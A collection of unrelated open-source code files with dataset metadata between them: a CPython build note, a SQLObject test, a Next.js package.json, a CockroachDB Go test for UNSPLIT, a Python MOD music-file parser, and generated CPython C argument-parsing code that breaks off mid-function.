The run `configure` with `PKG_CONFIG_PATH` environment variable.
```shell
PKG_CONFIG_PATH=Misc/rhel7 ./configure -C
``` | unknown | github | https://github.com/python/cpython | Misc/rhel7/README.md |
from sqlobject import *
from sqlobject.tests.dbtest import *
class myid_sqlmeta(sqlmeta):
idName = "my_id"
class TestSqlmeta1(SQLObject):
class sqlmeta(myid_sqlmeta):
pass
class TestSqlmeta2(SQLObject):
class sqlmeta(sqlmeta):
style = MixedCaseStyle(longID=True)
class TestSqlmeta3(SQLObject):
class sqlmeta(myid_sqlmeta):
style = MixedCaseStyle(longID=True)
class TestSqlmeta4(SQLObject):
class sqlmeta(myid_sqlmeta):
idName = None
style = MixedCaseStyle(longID=True)
class longid_sqlmeta(sqlmeta):
idName = "my_id"
style = MixedCaseStyle(longID=True)
class TestSqlmeta5(SQLObject):
class sqlmeta(longid_sqlmeta):
pass
class TestSqlmeta6(SQLObject):
class sqlmeta(longid_sqlmeta):
idName = None
def test_sqlmeta_inherited_idName():
setupClass([TestSqlmeta1, TestSqlmeta2])
assert TestSqlmeta1.sqlmeta.idName == "my_id"
assert TestSqlmeta2.sqlmeta.idName == "TestSqlmeta2ID"
assert TestSqlmeta3.sqlmeta.idName == "my_id"
assert TestSqlmeta4.sqlmeta.idName == "TestSqlmeta4ID"
assert TestSqlmeta5.sqlmeta.idName == "my_id"
assert TestSqlmeta6.sqlmeta.idName == "TestSqlmeta6ID" | unknown | codeparrot/codeparrot-clean | ||
{
"private": true,
"scripts": {
"dev": "next",
"build": "next build",
"start": "next start",
"toolbox": "react-toolbox-themr"
},
"dependencies": {
"classnames": "^2.2.5",
"next": "latest",
"react": "^18.2.0",
"react-addons-css-transition-group": "^15.5.2",
"react-dom": "^18.2.0",
"react-toolbox": "^2.0.0-beta.8"
},
"devDependencies": {
"react-toolbox-themr": "^1.0.2"
},
"reactToolbox": {
"include": [
"BUTTON",
"DATE_PICKER"
],
"customProperties": {
"animation-duration": "0.3s",
"color-accent": "var(--palette-pink-a200)",
"color-accent-dark": "var(--palette-pink-700)",
"color-primary-contrast": "var(--color-dark-contrast)",
"color-accent-contrast": "var(--color-dark-contrast)"
},
"output": "public",
"javascript": "./theme.js"
}
} | json | github | https://github.com/vercel/next.js | examples/with-react-toolbox/package.json |
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package sql_test
import (
"context"
gosql "database/sql"
"strings"
"testing"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/kv/kvserver"
"github.com/cockroachdb/cockroach/pkg/multitenant/tenantcapabilitiespb"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/stretchr/testify/require"
)
func TestUnsplitAt(t *testing.T) {
defer leaktest.AfterTest(t)()
defer log.Scope(t).Close(t)
var params base.TestServerArgs
// TODO(jeffreyxiao): Disable the merge queue due to a race condition. The
// merge queue might issue an AdminMerge and before the actual merge happens,
// the LHS of the merge is manually split and is later merged even though a
// sticky bit has been set on the new RHS. This race condition happens
// because there is two independent fetches of the RHS during a merge
// operation (one in the merge queue and another in the actual merge). The
// merge queue should pass the expected descriptor of the RHS into the
// AdminMerge request.
params.Knobs = base.TestingKnobs{
Store: &kvserver.StoreTestingKnobs{
DisableMergeQueue: true,
},
}
s, db, _ := serverutils.StartServer(t, params)
defer s.Stopper().Stop(context.Background())
if s.DeploymentMode().IsExternal() {
require.NoError(t, s.GrantTenantCapabilities(
context.Background(), serverutils.TestTenantID(),
map[tenantcapabilitiespb.ID]string{
tenantcapabilitiespb.CanAdminSplit: "true",
tenantcapabilitiespb.CanAdminUnsplit: "true",
}))
}
r := sqlutils.MakeSQLRunner(db)
r.Exec(t, "CREATE DATABASE d")
r.Exec(t, `CREATE TABLE d.t (
i INT,
s STRING,
PRIMARY KEY (i, s),
INDEX s_idx (s)
)`)
r.Exec(t, `CREATE TABLE d.i (k INT PRIMARY KEY)`)
r.Exec(t, `CREATE TABLE i (k INT PRIMARY KEY)`)
tests := []struct {
splitStmt string
unsplitStmt string
// Number of unsplits expected.
count int
error string
args []interface{}
}{
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (2, 'b')",
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (2, 'b')",
count: 1,
},
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (3, 'c'), (4, 'd')",
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (3, 'c'), (4, 'd')",
count: 2,
},
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (5, 'd')",
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT SELECT 5, 'd'",
count: 1,
},
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (6, 'e'), (7, 'f')",
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT SELECT * FROM (VALUES (6, 'e'), (7, 'f')) AS a",
count: 2,
},
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (10)",
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (10)",
count: 1,
},
{
splitStmt: "ALTER TABLE d.i SPLIT AT VALUES (1)",
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ((SELECT 1))",
count: 1,
},
{
splitStmt: "ALTER TABLE d.i SPLIT AT VALUES (8)",
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
args: []interface{}{8},
count: 1,
},
{
splitStmt: "ALTER INDEX d.t@s_idx SPLIT AT VALUES ('f')",
unsplitStmt: "ALTER INDEX d.t@s_idx UNSPLIT AT VALUES ('f')",
count: 1,
},
{
splitStmt: "ALTER TABLE d.t SPLIT AT VALUES (8, 'g'), (9, 'h'), (10, 'i')",
unsplitStmt: "ALTER TABLE d.t UNSPLIT ALL",
count: 3,
},
{
splitStmt: "ALTER INDEX d.t@s_idx SPLIT AT VALUES ('g'), ('h'), ('i')",
unsplitStmt: "ALTER INDEX d.t@s_idx UNSPLIT ALL",
count: 3,
},
{
splitStmt: "ALTER TABLE d.i SPLIT AT VALUES (10), (11), (12)",
unsplitStmt: "ALTER TABLE d.i UNSPLIT ALL",
count: 3,
},
{
splitStmt: "ALTER TABLE i SPLIT AT VALUES (10), (11), (12)",
unsplitStmt: "ALTER TABLE i UNSPLIT ALL",
count: 3,
},
{
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (1, 'non-existent')",
error: "could not UNSPLIT AT (1, 'non-existent')",
},
{
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES ('c', 3)",
error: "could not parse \"c\" as type int",
},
{
unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (i, s)",
error: `column "i" does not exist`,
},
{
unsplitStmt: "ALTER INDEX d.t@not_present UNSPLIT AT VALUES ('g')",
error: `index "not_present" does not exist`,
},
{
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES (avg(1::float))",
error: "aggregate functions are not allowed in VALUES",
},
{
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
error: "no value provided for placeholder: $1",
},
{
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
args: []interface{}{"blah"},
error: "error in argument for $1: could not parse \"blah\" as type int: strconv.ParseInt",
},
{
unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1::string)",
args: []interface{}{"1"},
error: "UNSPLIT AT data column 1 (k) must be of type int, not type string",
},
}
for _, tt := range tests {
var key roachpb.Key
var pretty string
var expirationTimestamp gosql.NullString
if tt.splitStmt != "" {
rows, err := db.Query(tt.splitStmt)
if err != nil {
t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
}
for rows.Next() {
if err := rows.Scan(&key, &pretty, &expirationTimestamp); err != nil {
t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
}
}
if err := rows.Err(); err != nil {
t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
}
}
rows, err := db.Query(tt.unsplitStmt, tt.args...)
if err != nil && tt.error == "" {
t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
} else if tt.error != "" && err == nil {
t.Fatalf("%s: expected error: %s", tt.unsplitStmt, tt.error)
} else if err != nil && tt.error != "" {
if !strings.Contains(err.Error(), tt.error) {
t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
}
} else {
actualCount := 0
for rows.Next() {
actualCount++
err := rows.Scan(&key, &pretty)
if err != nil {
t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
}
// Successful unsplit, verify it happened.
rng, err := s.LookupRange(key)
if err != nil {
t.Fatal(err)
}
if !rng.StickyBit.IsEmpty() {
t.Fatalf("%s: expected range sticky bit to be hlc.MinTimestamp, got %s", tt.unsplitStmt, rng.StickyBit)
}
}
if err := rows.Err(); err != nil {
t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
}
if tt.count != actualCount {
t.Fatalf("%s: expected %d unsplits, got %d", tt.unsplitStmt, tt.count, actualCount)
}
}
}
} | go | github | https://github.com/cockroachdb/cockroach | pkg/sql/unsplit_test.go |
import struct
from pymod.constants import *
from pymod.module import *
from pymod.tables import *
from pymod.util import *
MOD_TYPES = (
('M.K.', 'Amiga-NewTracker', 4),
('M!K!', 'Amiga-ProTracker', 4),
('M&K!', 'Amiga-NoiseTracker', 4),
('N.T.', 'Amiga-NoiseTracker?', 4), # ???, mentioned in libModplug
('CD81', '8 Channel Falcon', 8),
('OCTA', 'Amiga Oktalyzer', 8), # SchismTracker/libModplug have
('OKTA', 'Amiga Oktalyzer', 8), # 'C' or 'K', but not both
('FLT4', '4 Channel Startrekker', 4),
('FLT8', '8 Channel Startrekker', 8),
('2CHN', '2 Channel MOD', 2),
('3CHN', '3 Channel MOD', 3), # Does this show up ever?
('4CHN', '4 Channel MOD', 4),
('5CHN', '5 Channel TakeTracker', 5),
('6CHN', '6 Channel MOD', 6),
('7CHN', '7 Channel TakeTracker', 7),
('8CHN', '8 Channel MOD', 8),
('9CHN', '9 Channel TakeTracker', 9),
('10CH', '10 Channel MOD', 10),
('11CH', '11 Channel TakeTracker', 11),
('12CH', '12 Channel MOD', 12),
('13CH', '13 Channel TakeTracker', 13),
('14CH', '14 Channel MOD', 14),
('15CH', '15 Channel TakeTracker', 15),
('16CH', '16 Channel MOD', 16),
('18CH', '18 Channel MOD', 18),
('20CH', '20 Channel MOD', 20),
('22CH', '22 Channel MOD', 22),
('24CH', '24 Channel MOD', 24),
('26CH', '26 Channel MOD', 26),
('28CH', '28 Channel MOD', 28),
('30CH', '30 Channel MOD', 30),
('32CH', '32 Channel MOD', 32),
('16CN', '16 Channel MOD', 16), # Not certain where these two
('32CN', '32 Channel MOD', 32), # come from. (libModplug)
('TDZ1', '1 Channel TakeTracker', 1),
('TDZ2', '2 Channel TakeTracker', 2),
('TDZ3', '3 Channel TakeTracker', 3),
('TDZ4', '4 Channel MOD', 4),
('TDZ5', '5 Channel MOD', 5),
('TDZ6', '6 Channel MOD', 6),
('TDZ7', '7 Channel MOD', 7),
('TDZ8', '8 Channel MOD', 8),
('TDZ9', '9 Channel MOD', 9)
)
class MODNote(Note):
"""The definition of a generic MOD note and it's effects"""
def __init__(self, pattdata=[]):
if pattdata:
note = self.mod_period_to_note(((pattdata[0] & 0xf) << 8) + pattdata[1])
instrument = (pattdata[0] & 0xf0) + (pattdata[2] >> 4)
voleffect = VOLFX_NONE
volparam = 0
effect = pattdata[2] & 0xf
param = pattdata[3]
super(MODNote, self).__init__(note, instrument, voleffect, volparam, effect, param)
else:
super(MODNote, self).__init__(0, 0, 0, 0, 0, 0)
def mod_period_to_note(self, period):
if period:
for num in range(NOTE_LAST + 1):
if period >= (32 * period_table[num % 12] >> (num / 12 + 2)):
return num + 1
return NOTE_NONE
def __unicode__(self):
keys = ['C-', 'C#', 'D-', 'D#', 'E-', 'F-', 'F#', 'G-', 'G#', 'A-', 'A#', 'B-']
commands = '123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
if self.note == 0: ret1 = '...'
elif self.note > 0 and self.note <=120:
split = divmod(self.note-1, 12)
ret1 = '%s%s' % (keys[split[1]], str(split[0]))
elif self.note == 254: ret1 = '^^^'
elif self.note == 255: ret1 = '==='
if self.instrument: ret2 = str(self.instrument).zfill(2)
else: ret2 = '..'
# No volume columns for MOD files
ret3 = '..'
if self.effect: letter = commands[self.effect-1]
else: letter = '.'
ret4 = '%s%s' % (letter, hex(self.param)[2:].zfill(2).upper())
return '%s %s %s %s' % (ret1, ret2, ret3, ret4)
def __repr__(self):
return self.__unicode__()
class MODPattern(Pattern):
"""The definition of the MOD pattern"""
def __init__(self, file=None, rows=64, channels=4):
super(MODPattern, self).__init__(rows, channels)
if file:
self.load(file)
else:
self.data = self.empty(self.rows, self.channels)
def empty(self, rows, channels):
pattern = []
for row in range(rows):
pattern.append([])
for channel in range(channels):
pattern[row].append(MODNote())
return pattern
def load(self, file):
self.data = self.empty(self.rows, self.channels)
for row in range(self.rows):
for channel in range(self.channels):
self.data[row][channel] = MODNote(list(struct.unpack(">4B", file.read(4))))
class MODSample(Sample):
"""Definition of an MOD sample"""
def __init__(self, file=None):
super(MODSample, self).__init__()
self.modsamploadflags = SF_8 | SF_LE | SF_M | SF_PCMS
if file: self.load(file, 0)
def load(self, file, loadtype=0):
if loadtype == 0:
# Loads the MOD sample headers
modsampname = struct.unpack(">22s", file.read(22))[0]
modsamplength = struct.unpack(">H", file.read(2))[0]
modsampfinetune = struct.unpack(">b", file.read(1))[0]
modsampvolume = struct.unpack(">B", file.read(1))[0]
modsamploopbegin = struct.unpack(">H", file.read(2))[0]
modsamplooplength = struct.unpack(">H", file.read(2))[0]
# Parse it into generic Sample
self.name = modsampname
self.filename = modsampname
self.volume = MIN(modsampvolume, 64) * 4
self.length = modsamplength * 2
self.c5speed = MOD_FINETUNE(modsampfinetune)
self.loopbegin = modsamploopbegin
if modsamplooplength > 2: self.flags = self.flags | CHN_LOOP
self.loopend = self.loopbegin + modsamplooplength
elif loadtype == 1:
# . . .otherwise, load sample data
super(MODSample, self).load(file, file.tell(), self.modsamploadflags)
class MOD(Module):
"""A class that holds a generic MOD file"""
def __init__(self, filename=None):
super(MOD, self).__init__()
if not filename:
self.id = '4CHN' # /b/, for teh lulz. . .(bad joke)
self.tracker = '4 Channel MOD'
self.restartpos = 0
self.channelnum = 4
self.samplenum = 31
else:
f = open(filename, 'rb') # NOTE: MOD files should be big-endian!
self.filename = filename
f.seek(1080) # Magic number is in middle of file.
magic = struct.unpack(">4s", f.read(4))[0]
self.id = ''
for TYPE in MOD_TYPES:
if magic == TYPE[0]:
self.id = magic
self.tracker = TYPE[1]
self.channelnum = TYPE[2]
self.samplenum = 31
break
if self.id == '':
self.id = '????'
self.tracker = '*OLD* 4 Channel MOD'
self.channelnum = 4
self.samplenum = 15
f.seek(0)
self.name = struct.unpack(">20s", f.read(20))[0] # Song title (padded with NULL)
self.samples = []
for num in range(self.samplenum):
self.samples.append(MODSample(f)) # Loading sample headers
self.ordernum = struct.unpack(">B", f.read(1))[0] # Number of orders in song
self.restartpos = struct.unpack(">B", f.read(1))[0] # Restart position
self.orders = list(struct.unpack(">128B", f.read(128)))
# Fixes for buggy Startrekker MOD's. . .
fixed = 0
if self.id == 'FLT8':
for order in self.orders:
if order & 1:
fixed = 1
self.id = 'FLT4'
self.tracker = '4 Channel Startrekker (buggy)'
self.channelnum = 4
if not fixed:
for num in range(128):
self.orders[num] = self.orders[num] >> 1
self.patternnum = max(self.orders) + 1
self.tempo = 125
self.speed = 6
curpos = f.tell()
# Testing for WOW files. . .
if self.id == 'M.K.':
f.seek(0, 2)
sampsize = 0
for num in range(self.samplenum):
sampsize = sampsize + self.samples[num].length
if f.tell() == 2048 * self.patternnum + sampsize + 3132:
self.channelnum = 8
self.tracker = 'Mods Grave WOW'
f.seek(curpos)
if self.id != '????':
f.seek(4, 1) # Skip the magic id. . .
self.patterns = []
if self.patternnum:
for num in range(self.patternnum):
self.patterns.append(MODPattern(f, channels=self.channelnum))
for num in range(self.samplenum):
self.samples[num].load(f, 1) # Loading sample data
f.close()
def detect(filename):
f = open(filename, 'rb')
f.seek(1080)
magic = struct.unpack(">4s", f.read(4))[0]
f.close()
for TYPE in MOD_TYPES:
if magic == TYPE[0]:
return 2
if filename.lower().endswith('.mod') or filename.lower().startswith('mod.'):
return 1
else:
return 0
detect = staticmethod(detect) | unknown | codeparrot/codeparrot-clean | ||
/*[clinic input]
preserve
[clinic start generated code]*/
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
# include "pycore_gc.h" // PyGC_Head
# include "pycore_runtime.h" // _Py_ID()
#endif
#include "pycore_abstract.h" // _PyNumber_Index()
#include "pycore_modsupport.h" // _PyArg_UnpackKeywords()
PyDoc_STRVAR(_interpqueues_create__doc__,
"create($module, /, maxsize, unboundop=-1, fallback=-1)\n"
"--\n"
"\n"
"Create a new cross-interpreter queue and return its unique generated ID.\n"
"\n"
"It is a new reference as though bind() had been called on the queue.\n"
"The caller is responsible for calling destroy() for the new queue\n"
"before the runtime is finalized.");
#define _INTERPQUEUES_CREATE_METHODDEF \
{"create", _PyCFunction_CAST(_interpqueues_create), METH_FASTCALL|METH_KEYWORDS, _interpqueues_create__doc__},
static PyObject *
_interpqueues_create_impl(PyObject *module, Py_ssize_t maxsize,
int unboundarg, int fallbackarg);
static PyObject *
_interpqueues_create(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 3
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(maxsize), &_Py_ID(unboundop), &_Py_ID(fallback), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"maxsize", "unboundop", "fallback", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "create",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[3];
Py_ssize_t noptargs = nargs + (kwnames ? PyTuple_GET_SIZE(kwnames) : 0) - 1;
Py_ssize_t maxsize;
int unboundarg = -1;
int fallbackarg = -1;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 3, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
{
Py_ssize_t ival = -1;
PyObject *iobj = _PyNumber_Index(args[0]);
if (iobj != NULL) {
ival = PyLong_AsSsize_t(iobj);
Py_DECREF(iobj);
}
if (ival == -1 && PyErr_Occurred()) {
goto exit;
}
maxsize = ival;
}
if (!noptargs) {
goto skip_optional_pos;
}
if (args[1]) {
unboundarg = PyLong_AsInt(args[1]);
if (unboundarg == -1 && PyErr_Occurred()) {
goto exit;
}
if (!--noptargs) {
goto skip_optional_pos;
}
}
fallbackarg = PyLong_AsInt(args[2]);
if (fallbackarg == -1 && PyErr_Occurred()) {
goto exit;
}
skip_optional_pos:
return_value = _interpqueues_create_impl(module, maxsize, unboundarg, fallbackarg);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_destroy__doc__,
"destroy($module, /, qid)\n"
"--\n"
"\n"
"Clear and destroy the queue.\n"
"\n"
"Afterward attempts to use the queue will behave as though it never existed.");
#define _INTERPQUEUES_DESTROY_METHODDEF \
{"destroy", _PyCFunction_CAST(_interpqueues_destroy), METH_FASTCALL|METH_KEYWORDS, _interpqueues_destroy__doc__},
static PyObject *
_interpqueues_destroy_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_destroy(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "destroy",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_destroy_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_list_all__doc__,
"list_all($module, /)\n"
"--\n"
"\n"
"Return the list of ID triples for all queues.\n"
"\n"
"Each ID triple consists of (ID, default unbound op, default fallback).");
#define _INTERPQUEUES_LIST_ALL_METHODDEF \
{"list_all", (PyCFunction)_interpqueues_list_all, METH_NOARGS, _interpqueues_list_all__doc__},
static PyObject *
_interpqueues_list_all_impl(PyObject *module);
static PyObject *
_interpqueues_list_all(PyObject *module, PyObject *Py_UNUSED(ignored))
{
return _interpqueues_list_all_impl(module);
}
PyDoc_STRVAR(_interpqueues_put__doc__,
"put($module, /, qid, obj, unboundop=-1, fallback=-1)\n"
"--\n"
"\n"
"Add the object\'s data to the queue.");
#define _INTERPQUEUES_PUT_METHODDEF \
{"put", _PyCFunction_CAST(_interpqueues_put), METH_FASTCALL|METH_KEYWORDS, _interpqueues_put__doc__},
static PyObject *
_interpqueues_put_impl(PyObject *module, int64_t qid, PyObject *obj,
int unboundarg, int fallbackarg);
static PyObject *
_interpqueues_put(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 4
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), &_Py_ID(obj), &_Py_ID(unboundop), &_Py_ID(fallback), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", "obj", "unboundop", "fallback", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "put",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[4];
Py_ssize_t noptargs = nargs + (kwnames ? PyTuple_GET_SIZE(kwnames) : 0) - 2;
int64_t qid;
PyObject *obj;
int unboundarg = -1;
int fallbackarg = -1;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 2, /*maxpos*/ 4, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
obj = args[1];
if (!noptargs) {
goto skip_optional_pos;
}
if (args[2]) {
unboundarg = PyLong_AsInt(args[2]);
if (unboundarg == -1 && PyErr_Occurred()) {
goto exit;
}
if (!--noptargs) {
goto skip_optional_pos;
}
}
fallbackarg = PyLong_AsInt(args[3]);
if (fallbackarg == -1 && PyErr_Occurred()) {
goto exit;
}
skip_optional_pos:
return_value = _interpqueues_put_impl(module, qid, obj, unboundarg, fallbackarg);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_get__doc__,
"get($module, /, qid)\n"
"--\n"
"\n"
"Return the (object, unbound op) from the front of the queue.\n"
"\n"
"If there is nothing to receive then raise QueueEmpty.");
#define _INTERPQUEUES_GET_METHODDEF \
{"get", _PyCFunction_CAST(_interpqueues_get), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get__doc__},
static PyObject *
_interpqueues_get_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "get",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_get_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_bind__doc__,
"bind($module, /, qid)\n"
"--\n"
"\n"
"Take a reference to the identified queue.\n"
"\n"
"The queue is not destroyed until there are no references left.");
#define _INTERPQUEUES_BIND_METHODDEF \
{"bind", _PyCFunction_CAST(_interpqueues_bind), METH_FASTCALL|METH_KEYWORDS, _interpqueues_bind__doc__},
static PyObject *
_interpqueues_bind_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_bind(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "bind",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_bind_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_release__doc__,
"release($module, /, qid)\n"
"--\n"
"\n"
"Release a reference to the queue.\n"
"\n"
"The queue is destroyed once there are no references left.");
#define _INTERPQUEUES_RELEASE_METHODDEF \
{"release", _PyCFunction_CAST(_interpqueues_release), METH_FASTCALL|METH_KEYWORDS, _interpqueues_release__doc__},
static PyObject *
_interpqueues_release_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_release(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "release",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_release_impl(module, qid);
exit:
